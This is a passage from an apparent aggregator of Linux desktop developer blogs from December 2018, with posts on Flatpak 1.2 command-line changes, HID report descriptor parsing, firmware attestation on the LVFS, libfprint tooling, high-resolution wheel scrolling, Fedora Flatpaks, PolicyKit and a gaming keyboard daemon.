It happens all the time, I want to type search, but my c key is sticky, and it comes out as searh. Flatpak used to react to unknown command by dumping out its –help option, which is long and a bit overwhelming.

Now we try to be more concise and more helpful at the same time, by making a guess at what was meant, and just pointing out the –help option.

Friendly: Search

In the same vein, the reverse-DNS style application ID that Flatpak relies on has been criticized as unwieldy and hard to handle. Nobody wants to type

flatpak install flathub org.gnome.meld

and commandline completion does not help too much if you have no idea what the application ID might be.

Thankfully, that is no longer necessary. With Flatpak 1.2, you can type

flatpak install meld

and Flatpak will ask you a few questions to confirm which remote to use and what exact application you meant. Much friendlier. This search also works for the uninstall command, and may be added to more commands in the future.

Informative: Descriptions

Flatpak repos contain appstream data describing the apps in detail. That is what e.g. GNOME Software uses on its detail page for an application.

So far, the Flatpak commandline has not used appstream data at all. But that is changing. In 1.2, a number of commands will show useful information from appstream data, such as the description shown here by the list and info commands:

If you pay close attention you may notice that column names can be abbreviated with –columns.

Fun: Prompts

Here’s the commandline version of theming. We now set a custom prompt. to let you know what context you are in when using a shell in a flatpak sandbox.

You can customize the prompt using

flatpak override --env=PS1="..."

The application ID for the sandbox is available in the FLATPAK_ID environment variable.

The beast: Progress

Updates and installs can take a long time – there are possibly big downloads and there may be dependencies that need to be updated as well, etc. For a good user experience it is  important to provide some feedback on the progress and the expected remaining time.

The Ostree library which Flatpak uses for downloads provides progress information, but it is very detailed and hard to digest.  To make this even more challenging, there is not that much space in a terminal window to display all the relevant information.

For 1.2, we’ve come up with  a combination of a table that gets updated to display overall status and a progress line for the current operation:

<video class="wp-video-shortcode" controls="controls" height="248" id="video-2450-1" preload="metadata" width="474"><source src="https://blogs.gnome.org/mclasen/files/2018/12/install.webm?_=1" type="video/webm">https://blogs.gnome.org/mclasen/files/2018/12/install.webm</video>

A similar, but simpler layout is used for uninstalls.

<video class="wp-video-shortcode" controls="controls" height="248" id="video-2450-2" preload="metadata" width="474"><source src="https://blogs.gnome.org/mclasen/files/2018/12/uninstall.webm?_=2" type="video/webm">https://blogs.gnome.org/mclasen/files/2018/12/uninstall.webm</video>

Coming Soon

All of these improvements will appear in Flatpak 1.2, hopefully very soon after the New Year. Something to look forward to.  📦📦📦

Understanding HID report descriptors

Posted by Peter Hutterer on December 15, 2018 04:47 AM

This time we're digging into HID - Human Interface Devices and more specifically the protocol your mouse, touchpad, joystick, keyboard, etc. use to talk to your computer.

Remember the good old days where you had to install a custom driver for every input device? Remember when PS/2 (the protocol) had to be extended to accommodate for mouse wheels, and then again for five button mice. And you had to select the right protocol to make it work. Yeah, me neither, I tend to suppress those memories because the world is awful enough as it is.

As users we generally like devices to work out of the box. Hardware manufacturers generally like to add bits and bobs because otherwise who would buy that new device when last year's device looks identical. This difference in needs can only be solved by one superhero: Committee-man, with the superpower to survive endless meetings and get RFCs approved.

Many many moons ago, when USB itself was in its infancy, Committee man and his sidekick Caffeine boy got the USB consortium agree on a standard for input devices that is so self-descriptive that operating systems (Win95!) can write one driver that can handle this year's device, and next year's, and so on. No need to install extra drivers, your device will just work out of the box. And so HID was born. This may only be an approximate summary of history.

Originally HID was designed to work over USB. But just like Shrek the technology world is obsessed with layers so these days HID works over different transport layers. HID over USB is what your mouse uses, HID over i2c may be what your touchpad uses. HID works over Bluetooth and it's celebrity-diet version BLE. Somewhere, someone out there is very slowly moving a mouse pointer by sending HID over carrier pigeons just to prove a point. Because there's always that one guy.

HID is incredibly simple in that the static description of the device can just be bytes burnt into the ROM like the Australian sun into unprepared English backpackers. And the event frames are often an identical series of bytes where every bit is filled in by the firmware according to the axis/buttons/etc.

HID is incredibly complicated because parsing it is a stack-based mental overload. Each individual protocol item is simple but getting it right and all into your head is tricky. Luckily, I'm here for you to make this simpler to understand or, failing that, at least more entertaining.

As said above, the purpose of HID is to make devices describe themselves in a generic manner so that you can have a single driver handle any input device. The idea is that the host parses that standard protocol and knows exactly how the device will behave. This has worked out great, we only have around 200 files dealing with vendor- and hardware-specific HID quirks as of v4.20.

HID messages are Reports. And to know what a Report means and how to interpret it, you need a Report Descriptor. That Report Descriptor is static and contains a series of bytes detailing "what" and "where", i.e. what a sequence of bits represents and where to find those bits in the Report. So let's try and parse one of Report Descriptors, let's say for a fictional mouse with a few buttons. How exciting, we're at the forefront of innovation here.

The Report Descriptor consists of a bunch of Items. A parser reads the next Item, processes the information within and moves on. Items are small (1 byte header, 0-4 bytes payload) and generally only apply exactly one tiny little bit of information. You need to accumulate several items to build up enough information to actually know what's happening.

The "what" question of the Report Descriptor is answered with the so-called Usage. This could be something simple like X or Y (0x30 and 0x31) or something more esoteric like System Menu Exit (0x88). A Usage is 16 bits but all Usages are grouped into so-called Usage Pages. A Usage Page too is a 16 bit value and together they form the 32-bit value that tells us what the device can do. Examples:


0001 0031 # Generic Desktop, Y
0001 0088 # Generic Desktop, System Menu Exit
0003 0005 # VR Controls, Head Tracker
0003 0006 # VR Controls, Head Mounted Display
0004 0031 # Keyboard, Keyboard \ and |
Note how the Usage in the last item is the same as the first one, without the Usage Page you will mix things up. It helps if you always think of as the Usage as a 32-bit number. For your kids' bed-time story time, here are the HID Usage Tables from 2004 and the approved HID Usage Table Review Requests of the last decade. Because nothing puts them to sleep quicker than droning on about hex numbers associated with remote control buttons.

To successfully interpret a Report from the device, you need to know which bits have which Usage associated with them. So let's go back to our innovative mouse. We would want a report descriptor with 6 items like this:


Usage Page (Generic Desktop)
Usage (X)
Report Size (16)
Usage Page (Generic Desktop)
Usage (Y)
Report Size (16)
This basically tells the host: X and Y both have 16 bits. So if we get a 4-byte Report from the device, we know two bytes are for X, two for Y.

HID was invented when a time when bits were more expensive than printer ink, so we can't afford to waste any bits (still the case because who would want to spend an extra penny on more ROM). HID makes use of so-called Global items, once those are set their value applies to all following items until changed. Usage Page and Report Size are such Global items, so the above report descriptor is really implemented like this:


Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Input (Data,Var,Rel)
The Report Count just tells us that 2 fields of the current Report Size are coming up. We have two usages, two fields, and 16 bits each so we know what to do. The Input item is sort-of the marker for the end of the stack, it basically tells us "process what you've seen so far", together with a few flags. Rel in this case means that the Usages are relative. Oh, and Input means that this is data from device to host. Output would be data from host to device, e.g. to set LEDs on a keyboard. There's also Feature which indicates configurable items.

Buttons on a device are generally just numbered so it'd be monumental 16-bits-at-a-time waste to have HID send Usage (Button1), Usage (Button2), etc. for every button on the device. HID instead provides a Usage Minimum and Usage Maximumto sequentially order them. This looks like this:


Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Input (Data,Var,Abs)
So we have 5 buttons here and each button has one bit. Note how the buttons are Abs because a button state is not a relative value, it's either down or up. HID is quite intolerant to Schrödinger's thought experiments.

Let's put the two things together and we have an almost-correct Report descriptor:


Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Input (Data,Var,Abs)

Report Size (3)
Report Count (1)
Input (Cnst,Arr,Abs)

Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Input (Data,Var,Rel)
New here is Cnst. This signals that the bits have a constant value, thus don't need a Usage and basically don't matter (haha. yeah, right. in theory). Linux does indeed ignore those. Cnst is used for padding to align on byte boundaries - 5 bits for buttons plus 3 bits padding make 8 bits. Which makes one byte as everyone agrees except for granddad over there in the corner. I don't know how he got in.

Were we to get a 5-byte Report from the device, we'd parse it approximately like this:


button_state = byte[0] & 0x1f
x = bytes[1] | (byte[2] << 8)
y = bytes[3] | (byte[4] << 8)
Hooray, we're almost ready. Except not. We may need more info to correctly interpret the data within those reports.

The Logical Minimum and Logical Maximum specify the value range of the actual data. We need this to tell us whether the data is signed and what the allowable range is. Together with the Physical Minimumand the Physical Maximum they specify what the values really mean. In the simple case:


Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Logical Minimum (-32767)
Logical Maximum (32767)
Input (Data,Var,Rel)
This just means our x/y data is signed. Easy. But consider this combination:

...
Logical Minimum (0)
Logical Maximum (1)
Physical Minimum (1)
Physical Maximum (12)
This means that if the bit is 0, the effective value is 1. If the bit is 1, the effective value is 12.

Note that the above is one report only. Devices may have multiple Reports, indicated by the Report ID. So our Report Descriptor may look like this:


Report ID (01)
Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Input (Data,Var,Abs)
Report Size (3)
Report Count (1)
Input (Cnst,Arr,Abs)

Report ID (02)
Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Input (Data,Var,Rel)
If we were to get a Report now, we need to check byte 0 for the Report ID so we know what this is. i.e. our single-use hard-coded parser would look like this:

if byte[0] == 0x01:
button_state = byte[1] & 0x1f
else if byte[0] == 0x02:
x = bytes[2] | (byte[3] << 8)
y = bytes[4] | (byte[5] << 8)
A device may use multiple Reports if the hardware doesn't gather all data within the same hardware bits. Now, you may ask: if I get fifteen reports, how should I know what belongs together? Good question, and lucky for you the HID designers are miles ahead of you. Report IDs are grouped into Collections.

Collections can have multiple types. An Application Collectiondescribes a set of inputs that make sense as a whole. Usually, every Report Descriptor must define at least one Application Collection but you may have two or more. For example, a a keyboard with integrated trackpoint should and/or would use two. This is how the kernel knows it needs to create two separate event nodes for the device. Application Collections have a few reserved Usages that indicate to the host what type of device this is. These are e.g. Mouse, Joystick, Consumer Control. If you ever wondered why you have a device named like "Logitech G500s Laser Gaming Mouse Consumer Control" this is the kernel simply appending the Application Collection's Usage to the device name.

A Physical Collection indicates that the data is collected at one physical point though what a point is is a bit blurry. Theoretical physicists will disagree but a point can be "a mouse". So it's quite common for all reports on a mouse to be wrapped in one Physical Collections. If you have a device with two sets of sensors, you'd have two collections to illustrate which ones go together. Physical Collections also have reserved Usages like Pointer or Head Tracker.

Finally, a Logical Collection just indicates that some bits of data belong together, whatever that means. The HID spec uses the example of buffer length field and buffer data but it's also common for all inputs from a mouse to be grouped together. A quick check of my mice here shows that Logitech doesn't wrap the data into a Logical Collection but Microsoft's firmware does. Because where would we be if we all did the same thing...

Anyway. Now that we know about collections, let's look at a whole report descriptor as seen in the wild:


Usage Page (Generic Desktop)
Usage (Mouse)
Collection (Application)
Usage Page (Generic Desktop)
Usage (Mouse)
Collection (Logical)
Report ID (26)
Usage (Pointer)
Collection (Physical)
Usage Page (Button)
Usage Minimum (1)
Usage Maximum (5)
Report Count (5)
Report Size (1)
Logical Minimum (0)
Logical Maximum (1)
Input (Data,Var,Abs)
Report Size (3)
Report Count (1)
Input (Cnst,Arr,Abs)
Usage Page (Generic Desktop)
Usage (X)
Usage (Y)
Report Count (2)
Report Size (16)
Logical Minimum (-32767)
Logical Maximum (32767)
Input (Data,Var,Rel)
Usage (Wheel)
Physical Minimum (0)
Physical Maximum (0)
Report Count (1)
Report Size (16)
Logical Minimum (-32767)
Logical Maximum (32767)
Input (Data,Var,Rel)
End Collection
End Collection
End Collection
We have one Application Collection (Generic Desktop, Mouse) that contains one Logical Collection (Generic Desktop, Mouse). That contains one Physical Collection (Generic Desktop, Pointer). Our actual Report (and we have only one but it has the decimal ID 26) has 5 buttons, two 16-bit axes (x and y) and finally another 16 bit axis for the Wheel. This device will thus send 8-byte reports and our parser will do:

if byte[0] != 0x1a: # it's decimal in the above descriptor
error, should be 26
button_state = byte[1] & 0x1f
x = byte[2] | (byte[3] << 8)
y = byte[4] | (byte[5] << 8)
wheel = byte[6] | (byte[7] << 8)
That's it. Now, obviously, you can't write a parser for every HID descriptor out there so your actual parsing code needs to be generic. The Linux kernel does exactly that and so does everything else that needs to parse HID. There's a huge variety in devices out there, all with HID descriptors that may or may not be correct. As with so much in life, correct HID implementations are often defined by "whatever Windows accepts" so if you like playing catch, Linux development is for you.

Oh, in case you just got a bit too optimistic about the state of the world: HID allows for vendor-defined usages. Which does exactly what you'd think it does, it hides vendor-specific protocol inside what should be a generic protocol. There are devices with hidden report IDs that you can only unlock by sending the right magic sequence to the report and/or by defeating the boss on Level 4. Usually those devices present themselves as basic/normal devices over HID but if you know the magic sequence you get to use *gasp* all buttons. Or access the device-specific configuration features. Logitech's HID++ is just one example here but at least that's one where we have most of the specs available.

The above describes how to parse the HID report descriptor and interpret the reports. But what happens once you have a HID report correctly parsed? In the case of the Linux kernel, once the report descriptor is parsed evdev nodes are created (one per Application Collection, more or less). As the Reports come in, they are mapped to evdev codes and the data appears on the evdev node. That's where userspace like libinput can pick it up. That bit is actually quite simple (mostly anyway).

The above output was generated with the tools from the hid-tools repository. Go forth and hid-record.

Firmware Attestation

Posted by Richard Hughes on December 14, 2018 08:23 PM

When fwupd writes firmware to devices, it often writes it, then does a verify pass. This is to read back the firmware to check that it was written correctly. For some devices we can do one better, and read the firmware hash and compare it against a previously cached value, or match it against the version published by the LVFS. This means we can detect some unintentional corruption or malicious firmware running on devices, on the assumption that the bad firmware isn’t just faking the requested checksum. Still, better than nothing.

Any processor better than the most basic PIC or Arduino (e.g. even a tiny $5 ARM core) is capable of doing public/private key firmware signing. This would use standard crypto using X.509 keys or GPG to ensure the device only runs signed firmware. This protects against both accidental bitflips and also naughty behaviour, and is unofficial industry recommended practice for firmware updates. Older generations of the Logitech Unifying hardware were unsigned, and this made the MouseJack hack almost trivial to deploy on an unmodified dongle. Newer Unifying hardware requires a firmware image signed by Logitech, which makes deploying unofficial or modified firmware almost impossible.

There is a snag with UEFI capsule updates, which is how you probably applied your last “BIOS” firmware update. Although the firmware capsule is signed by the OEM or ODM, we can’t reliably read the SPI EEPROM from userspace. It’s fair to say flashrom does work on some older hardware but it also likes disabling keyboard controllers and making the machine reboot when probing hardware. We can get a hash of the firmware, or rather, a hash derived from the firmware image with other firmware-related things added for good measure. This is helpfully stored in the TPM chip, which most modern laptops have installed.

Although the SecureBoot process cares about the higher PCR values to check all manners of userspace, we only care about the index zero of this register, so called PCR0. If you change your firmware, for any reason, the PCR0 will change. There is one PCR0 checksum (or a number slightly higher than one, for reasons) on all hardware of a given SKU. If you somehow turn the requirement for the hardware signing key off on your machine (e.g. a newly found security issue), or your firmware is flashed using another method than UpdateCapsule (e.g. DediProg) then you can basically flash anything. This would be unlikely, but really bad.

If we include the PCR0 in the vendor-supplied firmware.metainfo.xml file, or set it in the admin console of the LVFS then we can verify that the firmware we’re running right now is the firmware the ODM or OEM uploaded. This means you can have firmware 100% verified, where you’re sure that the firmware version that was uploaded by the vendor is running on your machine right now. This is good.

As an incentive for vendors to support signing there are now “green ticks” and “red crosses” icons for each firmware on the LVFS. All green ticks mean the firmware was uploaded to the LVFS by the OEM or authorized ODM on behalf of the OEM, the firmware is signed using strong encryption, and we can do secure attestation for verification.

Obviously some protocols can’t do everything properly (e.g. ColorHug, even symmetric crypto isn’t good) but that’s okay. It’s still more secure than flashing a random binary from an FTP site, which is what most people were doing before. Not upstream yet, and not quite finished, so comments welcome.

The tools of libfprint

Posted by Bastien Nocera on December 14, 2018 04:04 PM
libfprint, the fingerprint reader driver library, is nearing a 1.0 release.

Since the last time I reported on the status of the library, we've made some headway modernising the library, using a variety of different tools. Let's go through them and how they were used.

Callcatcher

When libfprint was in its infancy, Daniel Drake found the NBIS fingerprint processing library matched what was required to provide fingerprint matching algorithms, and imported it in libfprint. Since then, the code in this copy-paste library in libfprint stayed the same. When updating it to the latest available version (from 2015 rather than 2007), as well as splitting off a patch to make it easier to update the library again in the future, I used Callcatcher to cull the unused functions.

Callcatcher is not a "production-level" tool (too many false positives, lack of support for many common architectures, etc.), but coupled with manual checking, it allowed us to greatly reduce the number of functions in our copy, so they weren't reported when using other source code quality checking tools.

LLVM's scan-build

This is a particularly easy one to use as its use is integrated into meson, and available through ninja scan-build. The output of the tool, whether on stderr, or on the HTML pages, is pretty similar to Coverity's, but the tool is free, and easily integrated into a CI (once you've fixed all the bugs, obviously). We found plenty of possible memory leaks and unintialised variables using this, with more flexibility than using Coverity's web interface, and avoiding going through hoops when using its "source code check as a service" model.

cflow and callgraph

LLVM has another tool, called callgraph. It's not yet integrated into meson, which was a bit of a problem to get some output out of it. But combined with cflow, we used it to find where certain functions were called, trying to find the origin of some variables (whether they were internal or device-provided for example), which helped with implementing additional guards and assertions in some parts of the library, in particular inside the NBIS sub-directory.

0.99.0 is out

We're not yet completely done with the first pass at modernising libfprint and its ecosystem, but we released an early Yule present with version 0.99.0. It will be integrated into Fedora after the holidays if the early testing goes according to plan.

We also expect a great deal from our internal driver API reference. If you have a fingerprint reader that's unsupported, contact your laptop manufacturer about them providing a Linux driver for it and point them at this documentation.

A number of laptop vendors are already asking their OEM manufacturers to provide drivers to be merged upstream, but a little nudge probably won't hurt.

Happy holidays to you all, and see you for some more interesting features in the new year.

High resolution wheel scrolling on Linux v4.21

Posted by Peter Hutterer on December 12, 2018 04:27 AM

Disclaimer: this is pending for v4.21 and thus not yet in any kernel release.

Most wheel mice have a physical feature to stop the wheel from spinning freely. That feature is called detents, notches, wheel clicks, stops, or something like that. On your average mouse that is 24 wheel clicks per full rotation, resulting in the wheel rotating by 15 degrees before its motion is arrested. On some other mice that angle is 18 degrees, so you get 20 clicks per full rotation.

Of course, the world wouldn't be complete without fancy hardware features. Over the last 10 or so years devices have added free-wheeling scroll wheels or scroll wheels without distinct stops. In many cases wheel behaviour can be configured on the device, e.g. with Logitech's HID++ protocol. A few weeks back, Harry Cutts from the chromium team sent patches to enable Logitech high-resolution wheel scrolling in the kernel. Succinctly, these patches added another axis next to the existing REL_WHEEL named REL_WHEEL_HI_RES. Where available, the latter axis would provide finer-grained scroll information than the click-by-click REL_WHEEL. At the same time I accidentally stumbled across the documentation for the HID Resolution Multiplier Feature. A few patch revisions later and we now have everything queued up for v4.21. Below is a summary of the new behaviour.

The kernel will continue to provide REL_WHEEL as axis for "wheel clicks", just as before. This axis provides the logical wheel clicks, (almost) nothing changes here. In addition, a REL_WHEEL_HI_RES axis is available which allows for finer-grained resolution. On this axis, the magic value 120 represents one logical traditional wheel click but a device may send a fraction of 120 for a smaller motion. Userspace can either accumulate the values until it hits a full 120 for one wheel click or it can scroll by a few pixels on each event for a smoother experience. The same principle is applied to REL_HWHEEL and REL_HWHEEL_HI_RES for horizontal scroll wheels (which these days is just tilting the wheel). The REL_WHEEL axis is now emulated by the kernel and simply sent out whenever we have accumulated 120.

Important to note: REL_WHEEL and REL_HWHEEL are now legacy axes and should be ignored by code handling the respective high-resolution version.

The magic value of 120 is taken directly from Windows. That value was chosen because it has a good number of integer factors, so dividing 120 by whatever multiplier the mouse uses gives you a integer fraction of 120. And because HW manufacturers want it to work on Windows, we can rely on them doing it right, provided we use the same approach.

There are two implementations that matter. Harry's patches enable the high-resolution scrolling on Logitech mice which seem to mostly have a multiplier of 8 (i.e. REL_WHEEL_HI_RES will send eight events with a value of 15 before REL_WHEEL sends 1 click). There are some interesting side-effects with e.g. the MX Anywhere 2S. In high-resolution mode with a multiplier of 8, a single wheel movement does not always give us 8 events, the firmware does its own magic here. So we have some emulation code in place with the goal of making the REL_WHEEL event happen on the mid-point of a wheel click motion. The exact point can shift a bit when the device sends 7 events instead of 8 so we have a few extra bits in place to reset after timeouts and direction changes to make sure the wheel behaviour is as consistent as possible.

The second implementation is for the generic HID protocol. This was all added for Windows Vista, so we're only about a decade behind here. Microsoft got the Resolution Multiplier feature into the official HID documentation (possibly in the hope that other HW manufacturers implement it which afaict didn't happen). This feature effectively provides a fixed value multiplier that the device applies in hardware when enabled. It's basically the same as the Logitech one except it's set through a HID feature instead of a vendor-specific protocol. On the devices tested so far (all Microsoft mice because no-one else seems to implement this) the multipliers vary a bit, ranging from 4 to 12. And the exact behaviour varies too. One mouse behaves correctly (Microsoft Comfort Optical Mouse 3000) and sends more events than before. Other mice just send the multiplied value instead of the normal value, so nothing really changes. And at least one mouse (Microsoft Sculpt Ergonomic) sends the tilt-wheel values more frequently and with a higher value. So instead of one event with value 1 every X ms, we now get an event with value 3 every X/4 ms. The mice tested do not drop events like the Logitech mice do, so we don't need fancy emulation code here. Either way, we map this into the 120 range correctly now, so userspace gets to benefit.

As mentioned above, the Resolution Multiplier HID feature was introduced for Windows Vista which is... not the most recent release. I have a strong suspicion that Microsoft dumped this feature as well, the most recent set of mice I have access to don't provide the feature anymore (they have vendor-private protocols that we don't know about instead). So the takeaway for all this is: if you have a Logitech mouse, you'll get higher-resolution scrolling on v4.21. If you have a Microsoft mouse a few years old, you may get high-resolution wheel scrolling if the device supports it. Any other vendor or a new Microsoft mouse, you don't get it.

Coincidentally, if you know anyone at Microsoft who can provide me with the specs for their custom protocol, I'd appreciate it. We'd love to have support for it both in libratbag and in the kernel. Or any other vendor, come to think of it.

AMI joins the LVFS

Posted by Richard Hughes on December 07, 2018 11:49 AM

American Megatrends Inc. may not be a company you’ve heard of, unless perhaps you like reading early-boot BIOS messages. AMI is the world’s largest BIOS firmware vendor, supplying firmware and tools to customers such as Asus, Clevo, Intel, AMD and many others. If you’ve heard of a vendor using Aptio for firmware updates, that means it’s from them. AMI has been testing the LVFS, UpdateCapsule and fwupd for a few months and is now fully compatible. They are updating their whitepapers for customers explaining the process of generating a capsule, using the ESRT, and generating deliverables for the LVFS.

This means “LVFS Support” becomes a first class citizen alongside Windows Update for the motherboard manufacturers. This should trickle down to the resellers, so vendors using Clevo motherboards like Tuxedo get LVFS support almost for free. This will take a bit of time to trickle down to the smaller OEMs.

Also, expect another large vendor announcement soon. It’s the one quite a few people have been waiting for.

Flatpaks in Fedora – now live

Posted by Owen Taylor on December 04, 2018 07:42 PM

fedora-plus-flatpak

I’m pleased to announce that we now have full initial support for Flatpak creation in Fedora infrastructure: Flatpaks can be built as containers, pushed to testing and stable via Bodhi, and installed by users from registry.fedoraproject.org through the command line, GNOME Software, or KDE Discover.

The goal of this work has been to enable creating Flatpaks from Fedora packages on Fedora infrastructure – this will expand the set of Flatpaks that are available to all Flatpak users, provide a runtime that gets updates as bugs and security fixes appear in Fedora, and provide Fedora users, especially on Fedora Silverblue, with an out-of-the-box set of Flatpak applications enabled by default.

At a technical level, a very brief summary of the approach we’ve taken is to take Fedora RPMs, rebuild them with prefix=/app using the Fedora modularity framework, then using the same container build service we use for server-side containers, create Flatpaks as OCI images . Flatpak has been extended to know how to browse, download, and install Flatpaks packaged as OCI images from a container registry. See my my talk at DevConf.CZ last year  for a slightly longer introduction to what we are doing.

Right now, there are only a few applications in the registry, but we will work to build up the set of applications over the next few months, and hopefully by the time that Fedora 30 comes out in the spring, will have something that will be genuinely useful for Fedora users and that can be enabled by default in Fedora Workstation.

Special thanks to Clement Verna, Randy Barlow, Kevin Fenzi, and the rest of the Fedora infrastructure team for a lot of help in making the Fedora deployment happen, as well as to the OSBS team and Alex Larsson!

Using it

From the command line, either add the stable remote:

flatpak remote-add fedora oci+https://registry.fedoraproject.org

Or add the testing remote:

flatpak remote-add fedora-testing oci+https://registry.fedoraproject.org#testing

There is no point in adding both, since all Flatpaks in the stable remote are also in the testing remote. (The plan is to eventually that most users will simply use the stable remote, and there will be links in Bodhi to make it easy to install a single application from testing.)

Note that some fixes were needed to make OCI remotes work properly system-wide. These were backported to the Fedora Flatpak-1.0.6 packages, but are only in master upstream, so if you aren’t using Fedora, you should add the remote per-user instead.

Creating Flatpaks

If you are a Fedora packager and want to create a Flatpak of a graphical application you maintain, or want to help out creating Flatpaks in general, see the packager documentation. There is also a list of applications that are easy to package as Flatpaks.

Future work

One thing that should make things easier for packagers is the flatpak common module – by depending on this module, different Flatpaks can share the same binary builds of common libraries. This is particularly important for libraries that take a long time to build, or when an application needs to bundle a large set of libraries (think KDE or TeX). The current flatpak-common is a prototype, and there needs to be some thought given to the policies and tools for updating it.

Automatic rebuilds of Flatpaks are essential: when a fix is added to a library that an application bundles, the module and Flatpak should automatically be rebuilt without the maintainer of the Flatpak having to know that there was something to do – and then the maintainer should be notified, either with a link to a build failure, or, more hopefully, with a link to a Bodhi update that was automatically filed. Adding Flatpak support to Freshmaker and deploying it for Fedora is probably the right course here – though not a small task.

Another thing that I hope to address in the near term is signatures. Right now the authenticity is checked by downloading a master index from https://registry.fedoraproject.org that contains hashes for the latest versions of applications. But having signatures on the images would add further protection against tampering, and depending on how they were implemented, could allow things like third party signatures added by an organization’s IT department. There’s quite a bit of complexity here, because there are multiple competing signature frameworks to coordinate: not just Flatpaks native signatures, but multiple different ways of signing container images.

A more long-term goal is to create a way to download updates to Flatpak container images as deltas, so that every update is not a full download. Reusing OCI images for Fedora Flatpaks has strong advantages for creating a common ecosystem between server applications and desktop applications, but on the server side, reducing bandwidth usage for server updates was usually not an important consideration, so the distribution strategy is simply to download everything from scratch. Hopefully work here could be shared between Flatpaks and the server usage of OCI images.

A PolicyKit refresher

Posted by Matthias Clasen on December 04, 2018 05:08 AM

PolicyKit has been around for a long time, and it is a mature system that basically does its job. I recently spent some time to improve the PolicyKit integration in Flatpak and thought it might be useful to write up some of the details.

Details, details

It is irritating when a dialog  pops up unexpectedly and asks questions without providing sufficient details to really know where it is coming from and what the context is. Like

Authentication is required to install software

It would be much better to say what software is being installed, and where it is coming from:

PolicyKit lets you do this by using variables in your message and providing the replacement for them via a PolkitDetails object:

Authentication is required to install $(ref) from $(origin)
polkit_details_insert (details, "origin", origin);
polkit_details_insert (details, "ref", ref);

No display – no problem

Its nice to get a  PolicyKit dialog when you are using a desktop app that needs to carry out a privileged operation. But PolicyKit is also used by commandline tools, such as flatpak. If you are running a command in a terminal, a dialog might still be ok. But what if you are using the flatpak on the console? A dialog is not available here, so privileged operations will fail.

PolicyKit provides the necessary plumbing to solve this situation, by letting apps register their own ‘agent’, which can handle authorization requests if no other agent is available. (In a graphical session, GNOME Shell provides an agent.)

Glancing over some details,  the code to do this looks roughly like this:

listener = polkit_agent_text_listener_new (NULL,
                                         &error);
polkit_agent_listener_register (listener,
            flags, subject, NULL, NULL, &error);

And it yields a result like this:If PolicyKits built-in text agent does not fit your needs, you can implement a PolkitAgentListener yourself. That is what I ended up doing for Flatpak.

Psst, don’t interrupt

As I said earlier, unexpected dialogs are annoying. Ideally, PolicyKit dialogs should only ever appear in response to a direct user action. For example, a dialog is ok if I am clicking the “Install” button in GNOME Software, but not if GNOME Software decides on it own that it is time to install some updates.

PolicyKit has a means to achieve this, by not passing the

POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION

flag when checking for authorization. But this check happens in the system service (or mechanism, in PolicyKit lingo), not in your client. In order to take advantage of this flag, the client needs to pass information about  user interaction along whenever it calls a privileged method of the mechanism.

In the Flatpak case, I added a ‘no-interaction’ flag to all the flatpak-system-helper methods, and library API that GNOME Software can use to set this flag for background operations.

So there should be less unexpected PolicyKit dialogs in the future.

Update: A useful PolicyKit feature that I forgot to mention is implications. If the the permissions (or actions, in PolicyKit lingo) are ordered in some way (e.g. if you are allowed to install applications, you should also be allowed to update them), you can express these relations with “imply” annotations. This can further reduce the need for duplicate dialogs.`

ggkbdd is a generic gaming keyboard daemon

Posted by Peter Hutterer on December 03, 2018 05:43 AM

Last week while reviewing a patch I read that some gaming keyboards have two modes - keyboard mode and gaming mode. When in gaming mode, the keys send out pre-recorded macros when pressed. Presumably (I am not a gamer) this is to record keyboard shortcuts to have quicker access to various functionalities. The macros are stored in the hardware and are thus relatively independent of the host system. Pprovided you have access to the custom protocol, which you probably don't when you're on Linux. But I digress.

I reckoned this could be done in software and work with any 5 dollar USB keyboard. A few hours later, I have this working now: ggkbdd. It sits directly above the kernel and waits for key events. Once the 'mode key' is hit, the keyboard will send pre-configured key sequences for the respective keys. Hitting the mode key again (or ESC) switches back to normal mode.

There's a lot of functionality that is missing such as integration with the desktop (probably via DBus), better security (dropping privs, masking the fd to avoid accidental key logging), better system integration (request fds from logind, possibly through the compositor). And error handling, etc. I think the total time on this spent is somewhere between 3 and 4h, and that includes the time to write this blog post and debug the systemd unit autostartup. There are likely other projects that solve it the same way, or at least in a similar manner. I didn't check.

This was done as proof-of-concept and

  • I don't know if it's useful and if so, what the use-cases are
  • I don't know if I will have any time to fix things on this
  • I don't know if other (better developed) projects already occupy that space
In the grand glorious future and provided this is indeed something generally useful, this would need compositor integration. Not sure we'll ever get to that point. Meanwhile, consider this a code drop for a proof-of-concept and expect that you'll have to fix any bugs yourself.

An update on Flatpak updates

Posted by Matthias Clasen on November 26, 2018 11:10 PM

A while ago, I’ve described how to handle restarting Flatpak apps when they are updated.

While I showed working code back then, the example was a bit  contrived, since it had to work around GApplication’s built-in uniqueness features.

With the just-landed support for replacement in GApplication, this is now much more straightforward, and I’ve updated my example to show how it works.

Restart yourself

There are a few steps to this.

First, we need to opt into allowing replacement by passing G_APPLICATION_ALLOW_REPLACEMENT when creating our GApplication:

app = g_object_new (portal_test_app_get_type (),
        "application-id", "org.gnome.PortalTest",
        "flags", G_APPLICATION_ALLOW_REPLACEMENT,
        NULL);

This flag makes GApplication handle a –gapplication-replace commandline option, which we will see in action later.

Next, we monitor the /app/.updated file. Flatpak creates this file inside a running sandbox when a new version of the app is available, so this is our signal to restart ourselves:

file = g_file_new_for_path ("/app/.updated");
update_monitor =
       g_file_monitor_file (file, 0, NULL, NULL);
g_signal_connect (update_monitor, "changed",
       G_CALLBACK (update_monitor_changed), win);

The update_monitor_changed function presents a dialog that offers the user to restart the app:

 if (response == GTK_RESPONSE_OK)
      portal_test_app_restart (app);

The portal_test_app_restart function is where we take advantage of the new GApplication functionality:

const char *argv[3] = {
    "/app/bin/portal-test",
    "--gapplication-replace",
    NULL
};

xdp_flatpak_call_spawn (flatpak, cwd, argv, ...);

We call the Spawn method of the Flatpak portal, passing –gapplication-replace as an commandline option, and everything else is handled for us. Easy!

Update 1: If D-Bus is not your thing, there is a simple commandline tool called flatpak-spawn that can be used for the same purpose. It is available inside the sandbox.

